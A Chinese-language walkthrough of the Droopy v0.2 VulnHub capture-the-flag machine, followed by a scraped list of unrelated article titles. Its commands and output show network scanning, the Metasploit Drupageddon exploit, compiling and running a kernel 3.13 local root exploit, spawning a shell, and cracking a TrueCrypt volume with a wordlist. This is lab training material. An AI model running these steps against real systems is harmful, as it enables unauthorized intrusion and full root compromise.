Hacking Box Droopy: v0.2
概述:
目标:get flag
下载链接: https://www.vulnhub.com/entry/droopy-v02,143/
工具: kail linux
开工
1)扫描开道:
# netdiscover -r 10.10.202.0/24
目标地址为:10.10.202.252
# nmap -sV 10.10.202.252
2)尝试利用
访问80
尝试创建一个账户,发现无法激活该账户
使用nikto 对站点进行识别
3)再信息收集,漏洞探测
# nikto -h 10.10.202.252
4)漏洞利用
尝试搜索exp
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 10.10.202.252
查看当前用户的权限
5)提权root
# searchsploit kernel 3.13
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root
上传exp
meterpreter > upload /root/37292.c /tmp/
[*] uploading : /root/37292.c -> /tmp/
[*] uploaded : /root/37292.c -> /tmp//37292.c
meterpreter >
meterpreter > shell
Process 1546 created.
Channel 3 created.
python -c 'import pty; pty.spawn("/bin/sh")'
$ pwd
pwd
/var/www/html
$ cd /tmp
cd /tmp
$ ls
ls
37292.c vmware-root
$ chmod 755 37292.c
chmod 755 37292.c
$ gcc -o exp 37292.c
gcc -o exp 37292.c
$ chmod +x exp
chmod +x exp
$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
6)获取flat文件内容
接下来对此文件进行破解
# ls -lh /usr/share/wordlists/rockyou.txt.gz
# gunzip rockyou.txt.gz
# cat rockyou.txt | grep academy > /root/dict.txt
# truecrack -t dave.tc -k sha512 -w dict.txt -v
参考:
https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/
https://aisherwood.gitbooks.io/reference-book/content/droopyos.html
转载于:https://www.cnblogs.com/hack404/p/10432230.html
Hacking Box Droopy: v0.2相关推荐
- virtual Box与Vagrant的安装与踩坑
vagrant的好处就不多说了,也不知道是人品问题还是啥,同事电脑上相同版本啥问题没有,我就不行,于是重新来过一遍,顺便把一些坑记录一下 安装+启动的命令如下(均在Windows下命令行中进行): v ...
- html5 canvas实现图片玻璃碎片特效
今天要为大家带来一款html5 canvas实现的图片玻璃碎片特效.图片以玻璃碎片的形式出现到界面中,然后似玻璃被打碎的效果渐消息.效果图如下: 在线预览 源码下载 实现代码: html代码: & ...
- Docker深入浅出系列 | 容器初体验
Docker深入浅出系列 | 容器初体验 教程目标 Docker已经上市很多年,不是什么新鲜事物了,很多企业或者开发同学以前也不多不少有所接触,但是有实操经验的人不多,本系列教程主要偏重实战,尽量讲干 ...
- 在 Mac/win7 下上使用 Vagrant 打造本地开发环境
1. vagrant介绍 1.1 vagrant能做什么 做Web开发(java/php/python/ruby...)少不了要在本地搭建好开发环境,虽然说目前各种脚本/语言都有对应的Windows版 ...
- vagrant springcloud java 镜像:制作详解(带下载地址)
狂创客圈 经典图书 : <Netty Zookeeper Redis 高并发实战> 面试必备 + 面试必备 + 面试必备 [博客园总入口 ] 疯狂创客圈 经典图书 : <Spring ...
- 【原创】MacOS 上使用 Vagrant + VirtualBox 安装 Ubuntu 18.04
安装准备 1.简介 使用 Vagrant + VirtualBox 的方式管理虚拟机极大方便了多操作系统环境需求的用户. 通过 Vagrant 安装与管理虚拟机,使得我们不用再去网上下载硕大的 ISO ...
- Linux Mint 19 下体验Vagrant +VirtualBox
安装教程 sudo dpkg -i vagrant_2.1.4_x86_64.deb sudo dpkg -i virtualbox-5.2_5.2.18-124319_Ubuntu_bionic_a ...
- 超详细 Vagrant 入门指南,建议收藏
搭建 Linux 虚拟机,别再用 VirtualBox 从 .iso 文件安装了. 概述 2020 年了,也许你已经习惯了 docker,习惯了在 XX 云上快速创建云主机,但是如果你想在个人电脑上安 ...
- vagrant初使用
由于自己笔记本的问题,正常使用vmware和virtualbox会蓝屏,所以采用vagrant的方式部署虚拟机 使用简单,不用自己安装虚拟机,有现成的镜像,只需下载安装vagrant后直接调用就可以了 ...
- vagrant日常操作
Vagrant简介 Vagrant 是一个用来构建和管理虚拟机环境的工具,实现配置运维自动化,支持virtualbox,vmware等常见hypervisor. 写这篇文章的目的主要是vagrant功 ...
最新文章
- SQL 2005 删除带有默认值约束的列
- RGB+Depth规则箱体测量方案
- Ajax应用开发:实践者指南
- 【javascript】javascript设计模式mixin模式
- ABAP formula
- array2xml xml2array
- 实验一 DOS命令解释程序的编写
- 已在该编译单元中定义_LLVM中的pass及其管理机制
- spring 事务源码分析(四)传播机制总览
- Web渗透测试实战——(2.1)Metasploit 6.0初步
- 用井字游戏理解 Minimax 算法
- 英国内政大臣表示社交软件加密不能太严
- 几何分布的期望和方差公式推导_平方差公式证明推导过程及运用详解(数学简便计算方法之一)...
- python 两个等长list的各对应位置元素相加+两个字典相加,相同键元素累加,不同键元素取全集
- JAVA 接口签名sign生成 工具类
- 美颜sdk动态贴纸技术、代码分析
- html5调用papy支付,Payment
- FASTQ文件详解【转】
- 新数据时代存储怎么卖,浪潮存储有高招!
- win2008 启用 mongodb 服务出错 1053 的解决方法